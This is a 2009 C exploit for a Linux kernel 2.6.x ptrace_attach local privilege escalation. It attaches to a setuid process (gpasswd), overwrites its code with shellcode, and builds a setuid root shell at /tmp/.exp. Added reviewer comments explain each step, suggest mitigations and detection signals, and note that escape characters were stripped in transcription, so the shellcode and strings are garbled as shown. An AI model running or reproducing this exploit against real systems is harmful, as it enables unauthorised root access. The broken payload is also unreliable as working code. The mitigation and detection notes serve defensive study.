
# Title : Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
# Published : 2009-05-13
# Author : s0m3b0dy


/*
ptrace_attach privilege escalation exploit by s0m3b0dy

[*] tested on Gentoo 2.6.29rc1

grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

email: s0m3b0dy1 (at) gmail.com
*/

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
/*
 * Payload that main() writes into the traced child at its saved EIP, one
 * word per PTRACE_POKETEXT.  It is three lines that look like a hex-escaped
 * machine-code stub followed by a plain shell command line; the command
 * writes a tiny C program to /tmp/.exp.c, compiles it to /tmp/.exp, removes
 * the source and marks the binary setuid.
 *
 * NOTE(review): as transcribed on this page the escape characters have been
 * stripped (e.g. "x6a" rather than a byte escape, "n" in place of newlines),
 * so the array does not hold the bytes the author describes; the length
 * used by the copy loop (sizeof(shellcode) - 1) is therefore also not the
 * original one.
 *
 * Defender view: a setuid-root file appearing under /tmp, and a compiler
 * being invoked from a traced setuid process, are both artefacts worth
 * alerting on.
 */
char shellcode[] =
"x6ax46x58x31xdbx31xc9xcdx80xebx21x5fx6ax0bx58x99" 
"x52x66x68x2dx63x89xe6x52x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x52x57x56x53x89xe1xcdx80xe8xdaxffxffxff"
"echo "#include <stdio.h>nmain(){setuid(0);if(getuid()==0) printf(\"r00teed!\n\");execv(\"/bin/bash\",0);return 0;}" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
/*
 * Hand-copied 32-bit x86 register block used as the destination of
 * PTRACE_GETREGS in main().  The odd name presumably avoids clashing with
 * the libc's own user_regs_struct.  Field order and widths must match the
 * kernel's i386 layout exactly, since the only field main() reads is `eip`
 * and it is located purely by offset.
 *
 * NOTE(review): this layout assumes a 32-bit x86 target (the header lists
 * Gentoo 2.6.29rc1 as the tested system); on any other architecture the
 * offsets, and therefore the value read as `eip`, are wrong.
 */
struct user_regs_struct322 {
        unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        unsigned long orig_eax, eip;
        unsigned short cs, __cs;
        unsigned long eflags, esp;
        unsigned short ss, __ss;
};

/*
 * Entry point.  Reviewer's summary of the sequence below (the code is left
 * exactly as published):
 *   1. fork(); the child execve()s the setuid binary named in env[0].
 *   2. The parent PTRACE_ATTACHes to that child and wait()s for it to stop.
 *   3. It reads the child's registers and overwrites the child's text at
 *      the saved EIP with `shellcode`, one word per PTRACE_POKETEXT.
 *   4. It resumes and detaches, sleeps, then execs /tmp/.exp if it exists.
 *
 * The privilege gain depends on the kernel allowing an unprivileged tracer
 * to attach to a process while it is exec'ing a setuid image; the page gives
 * no version information beyond "tested on Gentoo 2.6.29rc1".  Mitigation is
 * a kernel that closes that attach window plus restricted ptrace (e.g. the
 * Yama ptrace_scope sysctl).  Detection signals: a PTRACE_ATTACH whose
 * target is a setuid process, and a setuid-root file created under /tmp.
 *
 * NOTE(review): the printf strings have lost their newline escapes in
 * transcription ("n[-] Attachn"); this is an extraction artefact, not the
 * author's text.  Implicit-int `main()` is pre-C99 style.
 */
main()
{
struct user_regs_struct322  regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd";  // some suid file
env[1]=0;
/* Child: exec the setuid target.  `env` doubles as argv; envp is NULL. */
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
/* Parent: become the child's tracer.  Exits (not a failure code) on error. */
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("n[-] Attachn");
exit(0);
}
/* Block until the child changes state (status discarded); presumably the
 * stop delivered by the attach. */
 wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
                printf("n[-] read registersn");
		exit(0);
}
printf( "[+] EIP - 0x%08lxn", regs.eip);
/* Destination is the child's current instruction pointer; source is the
 * payload array reinterpreted as words. */
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
/* Copies sizeof(shellcode)-1 bytes in 4-byte words.  Note: if that length
 * is not a multiple of 4, the final `*src` read runs past the end of the
 * array (into the NUL terminator and up to two bytes beyond it). */
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                       printf("n[-] write shellcoden");
			exit(0);
}
/* Resume the child and drop the tracer relationship; neither return value
 * is checked. */
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...n");
/* Fixed delay rather than synchronisation with the child: the check below
 * races against whatever the child is doing. */
sleep(2);
/* Success is inferred solely from the file existing; its mode is not
 * checked.  execv's argv is NULL here. */
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...n"); 
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(n");
}
return 0;
}
